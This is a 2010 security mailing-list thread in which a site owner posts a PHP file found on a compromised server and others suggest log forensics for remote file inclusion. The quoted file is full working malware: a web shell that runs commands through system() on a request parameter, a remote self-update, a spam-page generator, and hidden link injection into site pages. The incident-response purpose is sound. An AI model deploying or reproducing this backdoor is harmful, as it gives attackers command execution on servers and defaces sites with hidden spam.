Googling for the IP "89.149.242.216" and "adsttnmq1" gave me this: http://www.phpfreaks.com/forums/index.php?topic=251135.msg1178041#msg1178041
Looks like the same person hit this guy. Adrian On Mon, Mar 1, 2010 at 2:32 PM, Adrian Crenshaw <[email protected]>wrote: > Thanks all. I googled for "adsttnmq1" earlier and found some stuff. Looking > through my logs, I found an IP of a host making a post to one of the URLs in > question. Still looking more into what it was doing. > > Thanks > Adrian > > > On Mon, Mar 1, 2010 at 12:12 PM, Andrew Ellis <[email protected]>wrote: > >> Historically, I've seen this stuff done through a Remote File Include, >> tho I can think of a dozen other ways to get it up on your server. I'd >> probably start by digging through the logs looking for someone >> including this file in some URL parameter. >> >> >> >> On Mon, Mar 1, 2010 at 10:31 AM, Jim Halfpenny <[email protected]> >> wrote: >> > A search for the string abcdefghiklmnjsweqrtyuiopzx shows another forum >> > thread with some info on this file: >> > >> > http://www.webhostingtalk.com/showthread.php?t=876121 >> > >> > I'm sure there are other sources of info out there. Time for some >> forensic >> > analysis of your logs to work out how and when this got here. I'm >> guessing >> > an automated attack against a known vuln in a PHP app? >> > >> > Jim >> > >> > On 1 March 2010 09:16, Adrian Crenshaw <[email protected]> wrote: >> >> >> >> Ok, I think one of my sites may have been compromised. I found the >> >> following PHP script on a site, but I'm not sure what it is trying to >> do. >> >> Anyone else ever seen this script before? 
>> >> >> >> Adrian >> >> >> >> <?php >> >> ignore_user_abort(1); >> >> set_time_limit(0); >> >> >> >> function Clear() >> >> { >> >> unlink("c"); >> >> unlink("1r"); >> >> unlink("log"); >> >> } >> >> >> >> function Clear2() >> >> { >> >> $mrd = trim(file_get_contents("m")); >> >> $pt = "../$mrd"; >> >> $fin = file_get_contents($pt); >> >> $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); >> >> $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); >> >> $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); >> >> $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); >> >> $fin = ereg_replace("<!--dd4-->", "", $fin); >> >> $fin = ereg_replace("<!--dd5-->", "", $fin); >> >> $fin = ereg_replace("<font style=\"position: absolute;overflow: >> >> hidden;height: 0;width: 0\">", "", $fin); >> >> $fmrd = fopen($pt, "w+"); >> >> fwrite($fmrd, $fin); >> >> fclose($fmrd); >> >> echo " upt-ok"; >> >> } >> >> >> >> function GetVar($name, &$var) >> >> { >> >> $var = ""; >> >> if (isset($_POST[$name])) >> >> $var = $_POST[$name]; >> >> >> >> if (isset($_GET[$name])) >> >> $var = $_GET[$name]; >> >> >> >> if (($var) =="") >> >> return false; >> >> else return true; >> >> } >> >> >> >> function Gen() >> >> { >> >> $alp = "abcdefghiklmnjsweqrtyuiopzx"; >> >> $maps = array(); >> >> if (isset($_POST["sg"])) >> >> $sg = $_POST["sg"]; >> >> >> >> if (isset($_GET["sg"])) >> >> $sg = $_GET["sg"]; >> >> >> >> if (isset($_POST["gm"])) >> >> $g = $_POST["gm"]; >> >> >> >> if (isset($_GET["gm"])) >> >> $g = $_GET["gm"]; >> >> >> >> >> >> $path = ""; >> >> $fr = fopen("1r", "a+"); >> >> if (file_exists("c")) >> >> { >> >> $fconf = file("c"); >> >> $tname = trim($fconf[0]); >> >> $cname = trim($fconf[1]); >> >> $curs = trim($fconf[2]); >> >> $pid = trim($fconf[3]); >> >> if ($pid == 100) >> >> { >> >> $pid = 0; >> >> $rnd = mt_rand(0, 999); >> >> $nm = ""; >> >> for ($i=0; $i<3; $i++) >> >> { >> >> $ran = mt_rand(0,26); >> >> $sym = $alp[$ran]; >> >> $nm = 
$nm.$sym; >> >> } >> >> $cname = $nm; >> >> mkdir("$tname/$cname"); >> >> $curs = $g; >> >> } >> >> } >> >> else >> >> { >> >> $rnd = mt_rand(0, 999); >> >> $nm = ""; >> >> for ($i=0; $i<5; $i++) >> >> { >> >> $ran = mt_rand(0,26); >> >> $sym = $alp[$ran]; >> >> $nm = $nm.$sym; >> >> } >> >> $tname = $nm; >> >> $pid = 0; >> >> $curs = $g; >> >> mkdir($tname); >> >> $fht = fopen("$tname/.htaccess", "w+"); >> >> $htname = $sg."2.txt"; >> >> $fp = fopen($htname, "r"); >> >> $fin = ''; >> >> while (!feof($fp)) >> >> { >> >> $fc = fgets($fp, 1024); >> >> if (!$fc) break; >> >> $fin .= $fc; >> >> } >> >> fclose($fp); >> >> fwrite($fht, $fin); >> >> fclose($fht); >> >> $rnd = mt_rand(0, 999); >> >> $nm = ""; >> >> for ($i=0; $i<3; $i++) >> >> { >> >> $ran = mt_rand(0,26); >> >> $sym = $alp[$ran]; >> >> $nm = $nm.$sym; >> >> } >> >> $cname = $nm; >> >> mkdir("$tname/$cname"); >> >> } >> >> $gname = $sg."sgen.php"; >> >> for ($j=$pid; $j<$pid+10; $j++) >> >> { >> >> $fp = fopen($gname."?g=$curs", "r"); >> >> $fin = ''; >> >> while (!feof($fp)) >> >> { >> >> $fc = fgets($fp, 1024); >> >> if (!$fc) break; >> >> $fin .= $fc; >> >> } >> >> fclose($fp); >> >> >> >> $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+"); >> >> fwrite($fnd, $fin); >> >> fclose($fnd); >> >> } >> >> >> >> if ($j==100) >> >> { >> >> $fp = fopen($gname."?g=$curs&m=1", "r"); >> >> $fin = ''; >> >> while (!feof($fp)) >> >> { >> >> $fc = fgets($fp, 1024); >> >> if (!$fc) break; >> >> $fin .= $fc; >> >> } >> >> fclose($fp); >> >> $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+"); >> >> fwrite($fnd, $fin); >> >> fclose($fnd); >> >> $map = "$path/$tname/$cname/$curs"."_lm.htm"; >> >> fwrite($fr,"$map\n"); >> >> } >> >> >> >> $fconf = fopen("c", "w+"); >> >> fwrite($fconf, $tname."\n"); >> >> fwrite($fconf, $cname."\n"); >> >> fwrite($fconf, $curs."\n"); >> >> $nj = $j; >> >> fwrite($fconf, $nj."\n"); >> >> fclose($fconf); >> >> } >> >> >> >> function Update() >> >> { >> >> $thisname = "1.php"; >> >> if 
(isset($_POST['u'])) >> >> $u = $_POST['u']; >> >> >> >> if (isset($_GET['u'])) >> >> $u = $_GET['u']; >> >> >> >> $fp = fopen($u, "r"); >> >> $fin = ''; >> >> while (!feof($fp)) >> >> { >> >> $fc = fgets($fp, 1024); >> >> if (!$fc) break; >> >> $fin .= $fc; >> >> } >> >> fclose($fp); >> >> >> >> $fthis = fopen($thisname, "w+"); >> >> fwrite($fthis, $fin); >> >> fclose($fthis); >> >> } >> >> >> >> function Com() >> >> { >> >> if (isset($_POST['c'])) >> >> @system($_POST['c']); >> >> if (isset($_GET['c'])) >> >> @system($_GET['c']); >> >> } >> >> >> >> function UpKos() >> >> { >> >> $mrd = trim(file_get_contents("m")); >> >> $pt = "../$mrd"; >> >> $fin = file_get_contents($pt); >> >> $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin); >> >> $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin); >> >> $fmrd = fopen($pt, "w+"); >> >> fwrite($fmrd, $fin); >> >> fclose($fmrd); >> >> } >> >> >> >> >> >> function MRepl() >> >> { >> >> $mpt = ""; >> >> $drs = ""; >> >> $begtag = "<adsttnmq1><font style=\"position: absolute;overflow: >> >> hidden;height: 0;width: 0\">"; >> >> $endtag = "</font></body></html><sdioyslkjs2> "; >> >> $mrd = trim(file_get_contents("m")); >> >> $pt = "../$mrd"; >> >> $fin = file_get_contents($pt); >> >> GetVar("mpt", $mpt); >> >> // óäàëÿåì çàâåðøàþùèå õòìë òåãè >> >> $fin = preg_replace ("/<\/body>/i", "", $fin); >> >> $fin = preg_replace ("/<\/html>/i", "", $fin); >> >> $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); >> >> $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); >> >> $fp = fopen($mpt, "r"); >> >> GetVar("drs", $drs); >> >> $fin = $fin.$begtag; >> >> $drs = str_replace("\\", "", $drs); >> >> $fin = $fin.$drs; >> >> $fin = $fin.$endtag; >> >> $fmrd = fopen($pt, "w+"); >> >> fwrite($fmrd, $fin); >> >> fclose($fmrd); >> >> } >> >> >> >> function Main() >> >> { >> >> if (isset($_POST['u']) || isset($_GET['u'])) >> >> { >> >> Update(); >> >> exit(); >> >> } >> >> >> >> if (isset($_POST['c']) || 
isset($_GET['c'])) >> >> { >> >> Com(); >> >> exit(); >> >> } >> >> >> >> if (isset($_POST['uk']) || isset($_GET['uk'])) >> >> { >> >> UpKos(); >> >> exit(); >> >> } >> >> >> >> if (isset($_POST['g']) || isset($_GET['g'])) >> >> { >> >> Gen(); >> >> exit(); >> >> } >> >> >> >> if (isset($_POST['s']) || isset($_GET['s'])) >> >> { >> >> MRepl(); >> >> exit(); >> >> } >> >> >> >> if (isset($_POST['cl']) || isset($_GET['cl'])) >> >> { >> >> Clear(); >> >> exit(); >> >> } >> >> >> >> if (isset($_POST['cl2']) || isset($_GET['cl2'])) >> >> { >> >> Clear2(); >> >> exit(); >> >> } >> >> >> >> echo "<ok>"; >> >> >> >> } >> >> >> >> Main(); >> >> >> >> ?> >> >> >> >> _______________________________________________ >> >> Pauldotcom mailing list >> >> [email protected] >> >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> >> Main Web Site: http://pauldotcom.com >> > >> > >> > _______________________________________________ >> > Pauldotcom mailing list >> > [email protected] >> > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> > Main Web Site: http://pauldotcom.com >> > >> >> >> >> -- >> Andrew Ellis >> http://blog.psych0tik.net >> _______________________________________________ >> Pauldotcom mailing list >> [email protected] >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> Main Web Site: http://pauldotcom.com >> > >
